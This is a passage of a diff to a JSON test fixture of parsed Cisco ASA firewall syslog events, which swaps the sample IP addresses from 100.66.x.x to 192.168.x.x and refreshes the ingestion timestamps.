bytes 945 TCP FINs", + "ingested": "2021-12-09T13:34:28.100014700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721901600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:34:28.100018900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721906Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100023Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721910400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.100026500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721914400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:34:28.100030800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" @@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721918400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:34:28.100036400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-09-07T12:21:32.721922400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:34:28.100042Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", @@ -12415,8 +12415,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721926800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100047800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -12446,8 +12446,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12482,7 +12482,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12491,8 +12491,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721931100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100053400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12508,7 +12508,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11820", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12530,8 +12530,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12566,7 +12566,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12575,8 +12575,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721935300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100059Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12592,7 +12592,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.162.30", + "mapped_source_ip": "192.168.162.30", "connection_id": "11821", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12614,8 +12614,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12650,7 +12650,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12660,8 +12660,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721941300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", + "ingested": "2021-12-09T13:34:28.100064500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12698,8 +12698,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12734,7 +12734,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12743,8 +12743,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721946500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100070100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12760,7 +12760,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11822", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12782,8 +12782,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12818,7 +12818,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12828,8 +12828,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721951Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", + "ingested": "2021-12-09T13:34:28.100075600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12866,8 +12866,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12902,7 +12902,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12912,8 +12912,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721955200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:34:28.100102900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12950,8 +12950,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -12986,7 +12986,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -12995,8 +12995,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721959500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100109Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13012,7 +13012,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.48.186", + "mapped_source_ip": "192.168.48.186", "connection_id": "11823", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13034,8 +13034,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -13070,7 +13070,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -13080,8 +13080,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721963800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", + "ingested": "2021-12-09T13:34:28.100114900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13113,8 +13113,8 @@ }, "destination": { "port": 8295, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1291, @@ -13154,7 +13154,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13162,8 +13162,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721968100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295", + "ingested": "2021-12-09T13:34:28.100120800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13196,8 +13196,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13232,7 +13232,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13241,8 +13241,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721972300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", + "ingested": "2021-12-09T13:34:28.100126600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13258,7 +13258,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11824", "source_interface": "outside", "mapped_destination_port": 1291 @@ -13280,8 +13280,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13316,7 +13316,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13325,8 +13325,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721976700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100131800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13342,7 +13342,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.254.94", + "mapped_source_ip": "192.168.254.94", "connection_id": "11825", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13364,8 +13364,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13400,7 +13400,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13410,8 +13410,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721985Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", + "ingested": "2021-12-09T13:34:28.100136700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13443,8 +13443,8 @@ }, "destination": { "port": 8296, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1292, @@ -13484,7 +13484,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13492,8 +13492,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721989700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296", + "ingested": "2021-12-09T13:34:28.100158500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13526,8 +13526,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13562,7 +13562,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13571,8 +13571,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721994300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", + "ingested": "2021-12-09T13:34:28.100164200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13588,7 +13588,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11826", "source_interface": "outside", "mapped_destination_port": 1292 @@ -13605,8 +13605,8 @@ }, "destination": { "port": 8297, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1293, @@ -13646,7 +13646,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13654,8 +13654,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721998600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297", + "ingested": "2021-12-09T13:34:28.100187400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13688,8 +13688,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13724,7 +13724,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13733,8 +13733,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722002900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", + "ingested": "2021-12-09T13:34:28.100192Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13750,7 +13750,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11827", "source_interface": "outside", "mapped_destination_port": 1293 @@ -13767,8 +13767,8 @@ }, "destination": { "port": 8298, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1294, @@ -13808,7 +13808,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13816,8 +13816,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722007300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298", + "ingested": "2021-12-09T13:34:28.100196400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13850,8 +13850,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13886,7 +13886,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13895,8 +13895,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722011500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", + "ingested": "2021-12-09T13:34:28.100201Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13912,7 +13912,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11828", "source_interface": "outside", "mapped_destination_port": 1294 @@ -13934,8 +13934,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13970,7 +13970,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13981,8 +13981,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722016300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", + "ingested": "2021-12-09T13:34:28.100205200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14014,8 +14014,8 @@ }, "destination": { "port": 8299, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1295, @@ -14055,7 +14055,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14063,8 +14063,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722020600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299", + "ingested": "2021-12-09T13:34:28.100210400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14097,8 +14097,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14133,7 +14133,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14142,8 +14142,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722024900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", + "ingested": "2021-12-09T13:34:28.100232500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14159,7 +14159,7 @@ "destination_interface": "inside", "mapped_source_port": 80, 